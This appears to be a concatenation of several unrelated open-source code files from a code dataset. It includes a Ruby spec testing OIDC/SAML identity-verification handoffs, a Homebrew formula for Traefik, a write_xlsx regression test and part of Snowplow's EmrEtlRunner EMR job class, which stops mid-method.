'titles.sign_up.verified',
app: APP_NAME,
)
expect_csp_headers_to_be_present if sp == :oidc
click_on I18n.t('forms.buttons.continue')
expect(user.events.account_verified.size).to be(1)
expect_successful_oidc_handoff if sp == :oidc
expect_successful_saml_handoff if sp == :saml
end
end
context 'unverified user sign in' do
let(:user) { user_with_2fa }
it 'requires idv and hands off successfully' do
visit_idp_from_sp_with_ial2(sp)
sign_in_user(user)
fill_in_code_with_last_phone_otp
click_submit_default
expect(current_path).to eq idv_jurisdiction_path
fill_out_idv_jurisdiction_ok
click_idv_continue
complete_idv_profile_ok(user)
click_acknowledge_personal_key
expect(page).to have_content t(
'titles.sign_up.verified',
app: APP_NAME,
)
expect_csp_headers_to_be_present if sp == :oidc
click_on I18n.t('forms.buttons.continue')
expect(user.events.account_verified.size).to be(1)
expect_successful_oidc_handoff if sp == :oidc
expect_successful_saml_handoff if sp == :saml
end
end
context 'verified user sign in' do
let(:user) { user_with_2fa }
before do
sign_in_and_2fa_user(user)
visit idv_session_path
complete_idv_profile_ok(user)
click_acknowledge_personal_key
first(:link, t('links.sign_out')).click
end
it 'does not require verification and hands off successfully' do
visit_idp_from_sp_with_ial2(sp)
sign_in_user(user)
fill_in_code_with_last_phone_otp
click_submit_default
expect_csp_headers_to_be_present if sp == :oidc
click_on I18n.t('forms.buttons.continue')
expect_successful_oidc_handoff if sp == :oidc
expect_successful_saml_handoff if sp == :saml
end
end
context 'second time a user signs in to an SP' do
let(:user) { user_with_2fa }
before do
visit_idp_from_sp_with_ial2(sp)
sign_in_user(user)
fill_in_code_with_last_phone_otp
click_submit_default
fill_out_idv_jurisdiction_ok
click_idv_continue
complete_idv_profile_ok(user)
click_acknowledge_personal_key
click_on I18n.t('forms.buttons.continue')
visit account_path
first(:link, t('links.sign_out')).click
end
it 'does not require idv or requested attribute verification and hands off successfully' do
visit_idp_from_sp_with_ial2(sp)
sign_in_user(user)
expect_csp_headers_to_be_present if sp == :oidc
fill_in_code_with_last_phone_otp
click_submit_default
expect_successful_oidc_handoff if sp == :oidc
expect_successful_saml_handoff if sp == :saml
end
end
def expect_csp_headers_to_be_present
expect(page.response_headers['Content-Security-Policy']).
to(include('form-action \'self\' http://localhost:7654'))
end
def expect_successful_oidc_handoff
redirect_uri = URI(current_url)
redirect_params = Rack::Utils.parse_query(redirect_uri.query).with_indifferent_access
expect(redirect_uri.to_s).to start_with('http://localhost:7654/auth/result')
expect(redirect_params[:state]).to eq(@state)
code = redirect_params[:code]
expect(code).to be_present
jwt_payload = {
iss: @client_id,
sub: @client_id,
aud: api_openid_connect_token_url,
jti: SecureRandom.hex,
exp: 5.minutes.from_now.to_i,
}
client_assertion = JWT.encode(jwt_payload, client_private_key, 'RS256')
client_assertion_type = 'urn:ietf:params:oauth:client-assertion-type:jwt-bearer'
page.driver.post api_openid_connect_token_path,
grant_type: 'authorization_code',
code: code,
client_assertion_type: client_assertion_type,
client_assertion: client_assertion
expect(page.status_code).to eq(200)
token_response = JSON.parse(page.body).with_indifferent_access
id_token = token_response[:id_token]
expect(id_token).to be_present
decoded_id_token, _headers = JWT.decode(
id_token, sp_public_key, true, algorithm: 'RS256'
).map(&:with_indifferent_access)
sub = decoded_id_token[:sub]
expect(sub).to be_present
expect(decoded_id_token[:nonce]).to eq(@nonce)
expect(decoded_id_token[:aud]).to eq(@client_id)
expect(decoded_id_token[:acr]).to eq(Saml::Idp::Constants::IAL2_AUTHN_CONTEXT_CLASSREF)
expect(decoded_id_token[:iss]).to eq(root_url)
expect(decoded_id_token[:email]).to eq(user.email)
expect(decoded_id_token[:given_name]).to eq('José')
expect(decoded_id_token[:social_security_number]).to eq('666-66-1234')
access_token = token_response[:access_token]
expect(access_token).to be_present
page.driver.get api_openid_connect_userinfo_path,
{},
'HTTP_AUTHORIZATION' => "Bearer #{access_token}"
userinfo_response = JSON.parse(page.body).with_indifferent_access
expect(userinfo_response[:sub]).to eq(sub)
expect(AgencyIdentity.where(user_id: user.id, agency_id: 2).first.uuid).to eq(sub)
expect(userinfo_response[:email]).to eq(user.email)
expect(userinfo_response[:given_name]).to eq('José')
expect(userinfo_response[:social_security_number]).to eq('666-66-1234')
end
def expect_successful_saml_handoff
profile_phone = user.active_profile.decrypt_pii(Features::SessionHelper::VALID_PASSWORD).phone
xmldoc = SamlResponseDoc.new('feature', 'response_assertion')
expect(AgencyIdentity.where(user_id: user.id, agency_id: 2).first.uuid).to eq(xmldoc.uuid)
expect(current_url).to eq @saml_authn_request
expect(xmldoc.phone_number.children.children.to_s).to eq(profile_phone)
end
def client_private_key
@client_private_key ||= begin
OpenSSL::PKey::RSA.new(
File.read(Rails.root.join('keys', 'saml_test_sp.key')),
)
end
end
def sp_public_key
page.driver.get api_openid_connect_certs_path
expect(page.status_code).to eq(200)
certs_response = JSON.parse(page.body).with_indifferent_access
JSON::JWK.new(certs_response[:keys].first).to_key
end
end
| 31.293578 | 98 | 0.711228 |
bbbc2be14dc06965b3d841946ccf1cc2307fcde0 | 2,747 | class Traefik < Formula
desc "Modern reverse proxy"
homepage "https://traefik.io/"
url "https://github.com/traefik/traefik/releases/download/v2.6.1/traefik-v2.6.1.src.tar.gz"
sha256 "06c24b339c8896cd8c2a88f85b1d6851ee2fcf9186169a7ff9df0ec87a0ed35e"
license "MIT"
head "https://github.com/traefik/traefik.git", branch: "master"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "470f2e3cd8a59a2293a73c3aa61d2ec0bac5ade053abf9b3966d75090cb2f07e"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "871ffc99145c7610f754f696a85dbd256e69fbf388d211357fe394bbddfd242d"
sha256 cellar: :any_skip_relocation, monterey: "41ba137ccea207ff7787772e64b0b79c5bcdc05f7591764f71b96c7b4eac568f"
sha256 cellar: :any_skip_relocation, big_sur: "c5c9ca94aabc889d34ecd8851297c6edf03c822e4091224f01a9d62636e724ac"
sha256 cellar: :any_skip_relocation, catalina: "19f1e5494136416b9a17df8024a55038cbc461997912d5fb4725bb28b5842cf6"
sha256 cellar: :any_skip_relocation, x86_64_linux: "1fb9e178336fa70d2b2d28b3a5e71a8157b7682faaedd979b88f1a97848a9876"
end
depends_on "go" => :build
depends_on "go-bindata" => :build
# Fix build with Go 1.18.
# Remove with v2.7.
patch do
url "https://github.com/traefik/traefik/commit/9297055ad8f651c751473b5fd4103eb224a8337e.patch?full_index=1"
sha256 "b633710c7bde8737fbe0170066a765ee749f014d38afd06ef40085773e152fd0"
end
def install
ldflags = %W[
-s -w
-X github.com/traefik/traefik/v#{version.major}/pkg/version.Version=#{version}
].join(" ")
system "go", "generate"
system "go", "build", *std_go_args(ldflags: ldflags), "./cmd/traefik"
end
service do
run [opt_bin/"traefik", "--configfile=#{etc}/traefik/traefik.toml"]
keep_alive false
working_dir var
log_path var/"log/traefik.log"
error_log_path var/"log/traefik.log"
end
test do
ui_port = free_port
http_port = free_port
(testpath/"traefik.toml").write <<~EOS
[entryPoints]
[entryPoints.http]
address = ":#{http_port}"
[entryPoints.traefik]
address = ":#{ui_port}"
[api]
insecure = true
dashboard = true
EOS
begin
pid = fork do
exec bin/"traefik", "--configfile=#{testpath}/traefik.toml"
end
sleep 5
cmd_ui = "curl -sIm3 -XGET http://127.0.0.1:#{http_port}/"
assert_match "404 Not Found", shell_output(cmd_ui)
sleep 1
cmd_ui = "curl -sIm3 -XGET http://127.0.0.1:#{ui_port}/dashboard/"
assert_match "200 OK", shell_output(cmd_ui)
ensure
Process.kill(9, pid)
Process.wait(pid)
end
assert_match version.to_s, shell_output("#{bin}/traefik version 2>&1")
end
end
| 35.217949 | 123 | 0.706589 |
08b935d3949f12bc926be4e3e421399f41042bca | 1,081 | # -*- coding: utf-8 -*-
require 'helper'
class TestRegressionTable06 < Test::Unit::TestCase
def setup
setup_dir_var
end
def teardown
File.delete(@xlsx) if File.exist?(@xlsx)
end
def test_table06
@xlsx = 'table06.xlsx'
workbook = WriteXLSX.new(@xlsx)
worksheet = workbook.add_worksheet
# Set the column width to match the taget worksheet.
worksheet.set_column('C:H', 10.288)
# Add the table.
worksheet.add_table('C3:F13')
worksheet.add_table('F15:H20')
worksheet.add_table('C23:D30')
# Add a link to check rId handling.
worksheet.write('A1', 'http://perl.com/')
worksheet.write('C1', 'http://perl.com/')
# Add comments to check rId handling.
worksheet.comments_author = 'John'
worksheet.write_comment('H1', 'Test1')
worksheet.write_comment('J1', 'Test2')
# Add drawing to check rId handling.
worksheet.insert_image('A4', File.join(@test_dir, 'regression', 'images/blue.png'))
workbook.close
compare_xlsx_for_regression(File.join(@regression_output, @xlsx), @xlsx)
end
end
| 25.738095 | 87 | 0.674376 |
7acb4f75119d281d76484296f75c0673e4cf379f | 60,757 | # Copyright (c) 2012-2020 Snowplow Analytics Ltd. All rights reserved.
#
# This program is licensed to you under the Apache License Version 2.0,
# and you may not use this file except in compliance with the Apache License Version 2.0.
# You may obtain a copy of the Apache License Version 2.0 at http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the Apache License Version 2.0 is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the Apache License Version 2.0 for the specific language governing permissions and limitations there under.
# Author:: Alex Dean (mailto:[email protected])
# Copyright:: Copyright (c) 2012-2020 Snowplow Analytics Ltd
# License:: Apache License Version 2.0
require 'set'
require 'elasticity'
require 'aws-sdk-s3'
require 'awrence'
require 'json'
require 'base64'
require 'contracts'
require 'iglu-client'
require 'securerandom'
require 'tempfile'
require 'rest-client'
# Ruby class to execute Snowplow's Hive jobs against Amazon EMR
# using Elasticity (https://github.com/rslifka/elasticity).
module Snowplow
module EmrEtlRunner
class EmrJob
include Contracts
# Constants
JAVA_PACKAGE = "com.snowplowanalytics.snowplow"
PARTFILE_REGEXP = ".*part-.*"
PARTFILE_GROUPBY_REGEXP = ".*(part-)\\d+-(.*)"
ATOMIC_EVENTS_PARTFILE_GROUPBY_REGEXP = ".*\/atomic-events\/(part-)\\d+-(.*)"
SHREDDED_TYPES_PARTFILE_GROUPBY_REGEXP = ".*\/shredded-types\/vendor=(.+)\/name=(.+)\/.+\/version=(.+)\/(part-)\\d+-(.*)"
SHREDDED_TSV_TYPES_PARTFILE_GROUPBY_REGEXP = ".*\/shredded-tsv\/vendor=(.+)\/name=(.+)\/.+\/version=(.+)\/(part-)\\d+-(.*)"
STREAM_ENRICH_REGEXP = ".*\.gz"
SUCCESS_REGEXP = ".*_SUCCESS"
STANDARD_HOSTED_ASSETS = "s3://snowplow-hosted-assets"
ENRICH_STEP_INPUT = 'hdfs:///local/snowplow/raw-events/'
ENRICH_STEP_OUTPUT = 'hdfs:///local/snowplow/enriched-events/'
SHRED_STEP_OUTPUT = 'hdfs:///local/snowplow/shredded-events/'
SHRED_JOB_WITH_PROCESSING_MANIFEST = Gem::Version.new('0.14.0-rc1')
SHRED_JOB_WITH_TSV_OUTPUT = Gem::Version.new('0.16.0-rc1')
RDB_LOADER_WITH_PROCESSING_MANIFEST = Gem::Version.new('0.15.0-rc4')
AMI_4 = Gem::Version.new("4.0.0")
AMI_5 = Gem::Version.new("5.0.0")
# Need to understand the status of all our jobflow steps
@@running_states = Set.new(%w(WAITING RUNNING PENDING SHUTTING_DOWN))
@@failed_states = Set.new(%w(FAILED CANCELLED))
include Monitoring::Logging
include Snowplow::EmrEtlRunner::Utils
include Snowplow::EmrEtlRunner::S3
include Snowplow::EmrEtlRunner::EMR
# Initializes our wrapper for the Amazon EMR client.
Contract Bool, Bool, Bool, Bool, Bool, Bool, Bool, Bool, ArchiveStep, ArchiveStep, ConfigHash, ArrayOf[String], String, TargetsHash, RdbLoaderSteps, Bool, String => EmrJob
def initialize(debug, staging, enrich, staging_stream_enrich, shred, es, archive_raw, rdb_load, archive_enriched, archive_shredded, config, enrichments_array, resolver, targets, rdbloader_steps, use_persistent_jobflow, persistent_jobflow_duration)
logger.debug "Initializing EMR jobflow"
# Configuration
custom_assets_bucket =
get_hosted_assets_bucket(STANDARD_HOSTED_ASSETS, config[:aws][:s3][:buckets][:assets], config[:aws][:emr][:region])
standard_assets_bucket =
get_hosted_assets_bucket(STANDARD_HOSTED_ASSETS, STANDARD_HOSTED_ASSETS, config[:aws][:emr][:region])
assets = get_assets(
custom_assets_bucket,
config.dig(:enrich, :versions, :spark_enrich),
config[:storage][:versions][:rdb_shredder],
config[:storage][:versions][:hadoop_elasticsearch],
config[:storage][:versions][:rdb_loader])
collector_format = config.dig(:collectors, :format)
@run_tstamp = Time.new
run_id = @run_tstamp.strftime("%Y-%m-%d-%H-%M-%S")
@run_id = run_id
@rdb_loader_log_base = config[:aws][:s3][:buckets][:log] + "rdb-loader/#{@run_id}/"
etl_tstamp = (@run_tstamp.to_f * 1000).to_i.to_s
output_codec = output_codec_from_compression_format(config.dig(:enrich, :output_compression))
encrypted = config[:aws][:s3][:buckets][:encrypted]
s3 = Aws::S3::Client.new(
:access_key_id => config[:aws][:access_key_id],
:secret_access_key => config[:aws][:secret_access_key],
:region => config[:aws][:s3][:region])
ami_version = Gem::Version.new(config[:aws][:emr][:ami_version])
shredder_version = Gem::Version.new(config[:storage][:versions][:rdb_shredder])
# Configure Elasticity with your AWS credentials
Elasticity.configure do |c|
c.access_key = config[:aws][:access_key_id]
c.secret_key = config[:aws][:secret_access_key]
end
# Create a job flow
@use_persistent_jobflow = use_persistent_jobflow
@persistent_jobflow_duration_s = parse_duration(persistent_jobflow_duration)
found_persistent_jobflow = false
if use_persistent_jobflow
emr = Elasticity::EMR.new(:region => config[:aws][:emr][:region])
emr_jobflow_id = get_emr_jobflow_id(emr, config[:aws][:emr][:jobflow][:job_name])
if emr_jobflow_id.nil?
@jobflow = Elasticity::JobFlow.new
else
@jobflow = get_emr_jobflow(emr_jobflow_id, config[:aws][:emr][:region])
found_persistent_jobflow = true
end
@jobflow.action_on_failure = "CANCEL_AND_WAIT"
@jobflow.keep_job_flow_alive_when_no_steps = true
else
@jobflow = Elasticity::JobFlow.new
end
# Configure
@jobflow.name = config[:aws][:emr][:jobflow][:job_name]
if ami_version < AMI_4
@legacy = true
@jobflow.ami_version = config[:aws][:emr][:ami_version]
else
@legacy = false
@jobflow.release_label = "emr-#{config[:aws][:emr][:ami_version]}"
end
@jobflow.tags = config[:monitoring][:tags]
@jobflow.ec2_key_name = config[:aws][:emr][:ec2_key_name]
@jobflow.region = config[:aws][:emr][:region]
@jobflow.job_flow_role = config[:aws][:emr][:jobflow_role] # Note job_flow vs jobflow
@jobflow.service_role = config[:aws][:emr][:service_role]
@jobflow.placement = config[:aws][:emr][:placement]
@jobflow.additional_info = config[:aws][:emr][:additional_info]
unless config[:aws][:emr][:ec2_subnet_id].nil? # Nils placement so do last and conditionally
@jobflow.ec2_subnet_id = config[:aws][:emr][:ec2_subnet_id]
end
unless config[:aws][:emr][:security_configuration].nil?
@jobflow.security_configuration = config[:aws][:emr][:security_configuration]
end
@jobflow.log_uri = config[:aws][:s3][:buckets][:log]
@jobflow.enable_debugging = debug
@jobflow.visible_to_all_users = true
@jobflow.master_instance_type = config[:aws][:emr][:jobflow][:master_instance_type]
@jobflow.timeout = 120
s3_endpoint = get_s3_endpoint(config[:aws][:s3][:region])
csbr = config[:aws][:s3][:buckets][:raw]
csbe = config[:aws][:s3][:buckets][:enriched]
csbs = config[:aws][:s3][:buckets][:shredded]
@pending_jobflow_steps = []
# Clear HDFS if persistent jobflow has been found
if found_persistent_jobflow
submit_jobflow_step(get_rmr_step([ENRICH_STEP_INPUT, ENRICH_STEP_OUTPUT, SHRED_STEP_OUTPUT], standard_assets_bucket, "Empty Snowplow HDFS"), use_persistent_jobflow)
submit_jobflow_step(get_hdfs_expunge_step, use_persistent_jobflow)
end
# staging
if staging
unless empty?(s3, csbr[:processing])
raise DirectoryNotEmptyError, "Cannot safely add staging step to jobflow, #{csbr[:processing]} is not empty"
end
src_pattern = collector_format == 'clj-tomcat' ? '.*localhost\_access\_log.*\.txt.*' : '.+'
src_pattern_regex = Regexp.new src_pattern
non_empty_locs = csbr[:in].select { |l|
not empty?(s3, l,
lambda { |k| !(k =~ /\/$/) and !(k =~ /\$folder\$$/) and !(k =~ src_pattern_regex).nil? })
}
if non_empty_locs.empty?
raise NoDataToProcessError, "No Snowplow logs to process since last run"
else
non_empty_locs.each { |l|
staging_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
staging_step.arguments = [
"--src", l,
"--dest", csbr[:processing],
"--s3Endpoint", s3_endpoint,
"--srcPattern", src_pattern,
"--deleteOnSuccess"
]
if collector_format == 'clj-tomcat'
staging_step.arguments = staging_step.arguments + [ '--groupBy', '.*/_*(.+)' ]
end
if encrypted
staging_step.arguments = staging_step.arguments + [ '--s3ServerSideEncryption' ]
end
staging_step.name = "[staging] s3-dist-cp: Raw #{l} -> Raw Staging S3"
staging_step_config = {:step => staging_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(staging_step_config, use_persistent_jobflow)
}
end
end
@jobflow.add_application("Hadoop") unless found_persistent_jobflow
if collector_format == 'thrift'
if @legacy
[
Elasticity::HadoopBootstrapAction.new('-c', 'io.file.buffer.size=65536'),
Elasticity::HadoopBootstrapAction.new('-m', 'mapreduce.user.classpath.first=true')
].each do |action|
@jobflow.add_bootstrap_action(action) unless found_persistent_jobflow
end
else
[{
"Classification" => "core-site",
"Properties" => {
"io.file.buffer.size" => "65536"
}
},
{
"Classification" => "mapred-site",
"Properties" => {
"mapreduce.user.classpath.first" => "true"
}
}].each do |config|
@jobflow.add_configuration(config) unless found_persistent_jobflow
end
end
end
# Add custom bootstrap actions
bootstrap_actions = config[:aws][:emr][:bootstrap]
unless bootstrap_actions.nil?
bootstrap_actions.each do |bootstrap_action|
@jobflow.add_bootstrap_action(Elasticity::BootstrapAction.new(bootstrap_action)) unless found_persistent_jobflow
end
end
# Prepare a bootstrap action based on the AMI version
bootstrap_script_location = if ami_version < AMI_4
"#{standard_assets_bucket}common/emr/snowplow-ami3-bootstrap-0.1.0.sh"
elsif ami_version >= AMI_4 && ami_version < AMI_5
"#{standard_assets_bucket}common/emr/snowplow-ami4-bootstrap-0.2.0.sh"
else
"#{standard_assets_bucket}common/emr/snowplow-ami5-bootstrap-0.1.0.sh"
end
cc_version = get_cc_version(config.dig(:enrich, :versions, :spark_enrich))
@jobflow.add_bootstrap_action(Elasticity::BootstrapAction.new(bootstrap_script_location, cc_version)) unless found_persistent_jobflow
# Install and launch HBase
hbase = config[:aws][:emr][:software][:hbase]
unless not hbase
install_hbase_action = Elasticity::BootstrapAction.new("s3://#{config[:aws][:emr][:region]}.elasticmapreduce/bootstrap-actions/setup-hbase")
@jobflow.add_bootstrap_action(install_hbase_action) unless found_persistent_jobflow
start_hbase_step = Elasticity::CustomJarStep.new("/home/hadoop/lib/hbase-#{hbase}.jar")
start_hbase_step.name = "Start HBase #{hbase}"
start_hbase_step.arguments = [ 'emr.hbase.backup.Main', '--start-master' ]
# NOTE: Presumes that HBase will remain available for a persistent cluster
start_hbase_step_config = {:step => start_hbase_step, :retry_on_fail => false, :rdb_loader_log => nil}
submit_jobflow_step(start_hbase_step_config, use_persistent_jobflow) unless found_persistent_jobflow
end
# Install Lingual
lingual = config[:aws][:emr][:software][:lingual]
unless not lingual
install_lingual_action = Elasticity::BootstrapAction.new("s3://files.concurrentinc.com/lingual/#{lingual}/lingual-client/install-lingual-client.sh")
@jobflow.add_bootstrap_action(install_lingual_action) unless found_persistent_jobflow
end
# EMR configuration: Spark, YARN, etc
configuration = config[:aws][:emr][:configuration]
unless configuration.nil?
configuration.each do |k, h|
@jobflow.add_configuration({"Classification" => k, "Properties" => h}) unless found_persistent_jobflow
end
end
# Now let's add our core group
core_instance_group = Elasticity::InstanceGroup.new.tap { |ig|
ig.type = config[:aws][:emr][:jobflow][:core_instance_type]
ig.count = config[:aws][:emr][:jobflow][:core_instance_count]
# check if bid exists
cib = config[:aws][:emr][:jobflow][:core_instance_bid]
if cib.nil?
ig.set_on_demand_instances
else
ig.set_spot_instances(cib)
end
}
@jobflow.set_core_instance_group(core_instance_group)
# Now let's add our task group if required
tic = config[:aws][:emr][:jobflow][:task_instance_count]
if tic > 0
instance_group = Elasticity::InstanceGroup.new.tap { |ig|
ig.count = tic
ig.type = config[:aws][:emr][:jobflow][:task_instance_type]
tib = config[:aws][:emr][:jobflow][:task_instance_bid]
if tib.nil?
ig.set_on_demand_instances
else
ig.set_spot_instances(tib)
end
}
@jobflow.set_task_instance_group(instance_group)
end
# EBS
unless config[:aws][:emr][:jobflow][:core_instance_ebs].nil?
ebs_bdc = Elasticity::EbsBlockDeviceConfig.new
ebs_bdc.volume_type = config[:aws][:emr][:jobflow][:core_instance_ebs][:volume_type]
ebs_bdc.size_in_gb = config[:aws][:emr][:jobflow][:core_instance_ebs][:volume_size]
ebs_bdc.volumes_per_instance = 1
if config[:aws][:emr][:jobflow][:core_instance_ebs][:volume_type] == "io1"
ebs_bdc.iops = config[:aws][:emr][:jobflow][:core_instance_ebs][:volume_iops]
end
ebs_c = Elasticity::EbsConfiguration.new
ebs_c.add_ebs_block_device_config(ebs_bdc)
ebs_c.ebs_optimized = true
unless config[:aws][:emr][:jobflow][:core_instance_ebs][:ebs_optimized].nil?
ebs_c.ebs_optimized = config[:aws][:emr][:jobflow][:core_instance_ebs][:ebs_optimized]
end
@jobflow.set_core_ebs_configuration(ebs_c)
end
stream_enrich_mode = !csbe[:stream].nil?
# Get full path when we need to move data to enrich_final_output
# otherwise (when enriched/good is non-empty already)
# we can list files withing folders using '*.'-regexps
enrich_final_output = if enrich || staging_stream_enrich
partition_by_run(csbe[:good], run_id)
else
csbe[:good]
end
if enrich
raw_input = csbr[:processing]
# When resuming from enrich, we need to check for emptiness of the processing bucket
if !staging and empty?(s3, raw_input)
raise NoDataToProcessError, "No Snowplow logs in #{raw_input}, can't resume from enrich"
end
# for ndjson/urbanairship we can group by everything, just aim for the target size
group_by = is_ua_ndjson(collector_format) ? ".*\/(\w+)\/.*" : ".*([0-9]+-[0-9]+-[0-9]+)-[0-9]+.*"
# Create the Hadoop MR step for the file crushing
compact_to_hdfs_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
compact_to_hdfs_step.arguments = [
"--src" , raw_input,
"--dest" , ENRICH_STEP_INPUT,
"--s3Endpoint" , s3_endpoint
] + [
"--groupBy" , group_by,
"--targetSize" , "128",
"--outputCodec" , "lzo"
].select { |el|
is_cloudfront_log(collector_format) || is_ua_ndjson(collector_format)
}
# uncompress events that are gzipped since this format is unsplittable and causes issues
# downstream in the spark enrich job snowplow/snowplow#3525
if collector_format == "clj-tomcat" then
compact_to_hdfs_step.arguments << "--outputCodec" << "none"
end
if encrypted
compact_to_hdfs_step.arguments = compact_to_hdfs_step.arguments + [ '--s3ServerSideEncryption' ]
end
compact_to_hdfs_step.name = "[enrich] s3-dist-cp: Raw S3 -> Raw HDFS"
compact_to_hdfs_step_config = {:step => compact_to_hdfs_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(compact_to_hdfs_step_config, use_persistent_jobflow)
# 2. Enrichment
enrich_asset = if assets[:enrich].nil?
raise ConfigError, "Cannot add enrich step as spark_enrich version is not configured"
else
assets[:enrich]
end
enrich_version = config.dig(:enrich, :versions, :spark_enrich)
enrich_step =
if is_spark_enrich(enrich_version) then
@jobflow.add_application("Spark") unless found_persistent_jobflow
build_spark_step(
"[enrich] spark: Enrich Raw Events",
enrich_asset,
"enrich.spark.EnrichJob",
{ :in => glob_path(ENRICH_STEP_INPUT),
:good => ENRICH_STEP_OUTPUT,
:bad => partition_by_run(csbe[:bad], run_id)
},
{ 'input-format' => collector_format,
'etl-timestamp' => etl_tstamp,
'iglu-config' => build_iglu_config_json(resolver),
'enrichments' => build_enrichments_json(enrichments_array)
}
)
else
build_scalding_step(
"[enrich] scalding: Enrich Raw Events",
enrich_asset,
"enrich.hadoop.EtlJob",
{ :in => glob_path(ENRICH_STEP_INPUT),
:good => ENRICH_STEP_OUTPUT,
:bad => partition_by_run(csbe[:bad], run_id),
:errors => partition_by_run(csbe[:errors], run_id, config.dig(:enrich, :continue_on_unexpected_error))
},
{ :input_format => collector_format,
:etl_tstamp => etl_tstamp,
:iglu_config => build_iglu_config_json(resolver),
:enrichments => build_enrichments_json(enrichments_array)
}
)
end
# Late check whether our enrichment directory is empty. We do an early check too
unless empty?(s3, csbe[:good])
raise DirectoryNotEmptyError, "Cannot safely add enrichment step to jobflow, #{csbe[:good]} is not empty"
end
enrich_step_config = {:step => enrich_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(enrich_step_config, use_persistent_jobflow)
# We need to copy our enriched events from HDFS back to S3
copy_to_s3_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_to_s3_step.arguments = [
"--src" , ENRICH_STEP_OUTPUT,
"--dest" , enrich_final_output,
"--groupBy" , PARTFILE_GROUPBY_REGEXP,
"--targetSize", "24",
"--s3Endpoint", s3_endpoint
] + output_codec
if encrypted
copy_to_s3_step.arguments = copy_to_s3_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_to_s3_step.name = "[enrich] spark: Enriched HDFS -> S3"
copy_to_s3_step_config = {:step => copy_to_s3_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_to_s3_step_config, use_persistent_jobflow)
copy_success_file_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_success_file_step.arguments = [
"--src" , ENRICH_STEP_OUTPUT,
"--dest" , enrich_final_output,
"--srcPattern" , SUCCESS_REGEXP,
"--s3Endpoint" , s3_endpoint
]
if encrypted
copy_success_file_step.arguments = copy_success_file_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_success_file_step.name = "[enrich] spark: Enriched HDFS _SUCCESS -> S3"
copy_success_file_step_config = {:step => copy_success_file_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_success_file_step_config, use_persistent_jobflow)
end
# Staging data produced by Stream Enrich
if staging_stream_enrich
unless empty?(s3, csbe[:good])
raise DirectoryNotEmptyError, "Cannot safely add stream staging step to jobflow, #{csbe[:good]} is not empty"
end
src_pattern_regex = Regexp.new STREAM_ENRICH_REGEXP
if empty?(s3, csbe[:stream], lambda { |k| !(k =~ /\/$/) and !(k =~ /\$folder\$$/) and !(k =~ src_pattern_regex).nil? })
raise NoDataToProcessError, "No Snowplow enriched stream logs to process since last run"
end
staging_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
staging_step.arguments = [
"--src" , csbe[:stream],
"--dest" , enrich_final_output,
"--s3Endpoint" , s3_endpoint,
"--srcPattern" , STREAM_ENRICH_REGEXP,
"--deleteOnSuccess"
]
if encrypted
staging_step.arguments = staging_step.arguments + [ '--s3ServerSideEncryption' ]
end
staging_step.name = "[staging_stream_enrich] s3-dist-cp: Stream Enriched #{csbe[:stream]} -> Enriched Staging S3"
staging_step_config = {:step => staging_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(staging_step_config, use_persistent_jobflow)
end
if shred
# 3. Shredding
shred_final_output = partition_by_run(csbs[:good], run_id)
# Add processing manifest if available
processing_manifest = get_processing_manifest(targets)
processing_manifest_shred_args =
if not processing_manifest.nil?
if shredder_version >= SHRED_JOB_WITH_PROCESSING_MANIFEST
{ 'processing-manifest-table' => processing_manifest, 'item-id' => shred_final_output }
else
{}
end
else
{}
end
# Add target config JSON if necessary
storage_target_shred_args = get_rdb_shredder_target(config, targets[:ENRICHED_EVENTS])
# If we enriched, we free some space on HDFS by deleting the raw events
# otherwise we need to copy the enriched events back to HDFS
if enrich
submit_jobflow_step(get_rmr_step([ENRICH_STEP_INPUT], standard_assets_bucket, "Empty Raw HDFS"), use_persistent_jobflow)
else
src_pattern = if stream_enrich_mode then STREAM_ENRICH_REGEXP else PARTFILE_REGEXP end
copy_to_hdfs_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_to_hdfs_step.arguments = [
"--src" , enrich_final_output, # Opposite way round to normal
"--dest" , ENRICH_STEP_OUTPUT,
"--srcPattern" , src_pattern,
"--outputCodec", "none",
"--s3Endpoint" , s3_endpoint
]
if encrypted
copy_to_hdfs_step.arguments = copy_to_hdfs_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_to_hdfs_step.name = "[shred] s3-dist-cp: Enriched S3 -> HDFS"
copy_to_hdfs_step_config = {:step => copy_to_hdfs_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_to_hdfs_step_config, use_persistent_jobflow)
end
shred_step =
if is_rdb_shredder(config[:storage][:versions][:rdb_shredder]) then
@jobflow.add_application("Spark") unless found_persistent_jobflow
duplicate_storage_config = build_duplicate_storage_json(targets[:DUPLICATE_TRACKING], false)
build_spark_step(
"[shred] spark: Shred Enriched Events",
assets[:shred],
"storage.spark.ShredJob",
{ :in => glob_path(ENRICH_STEP_OUTPUT),
:good => SHRED_STEP_OUTPUT,
:bad => partition_by_run(csbs[:bad], run_id)
},
{
'iglu-config' => build_iglu_config_json(resolver)
}.merge(duplicate_storage_config).merge(processing_manifest_shred_args).merge(storage_target_shred_args)
)
else
duplicate_storage_config = build_duplicate_storage_json(targets[:DUPLICATE_TRACKING])
build_scalding_step(
"[shred] scalding: Shred Enriched Events",
assets[:shred],
"enrich.hadoop.ShredJob",
{ :in => glob_path(ENRICH_STEP_OUTPUT),
:good => SHRED_STEP_OUTPUT,
:bad => partition_by_run(csbs[:bad], run_id),
:errors => partition_by_run(csbs[:errors], run_id, config.dig(:enrich, :continue_on_unexpected_error))
},
{
:iglu_config => build_iglu_config_json(resolver)
}.merge(duplicate_storage_config)
)
end
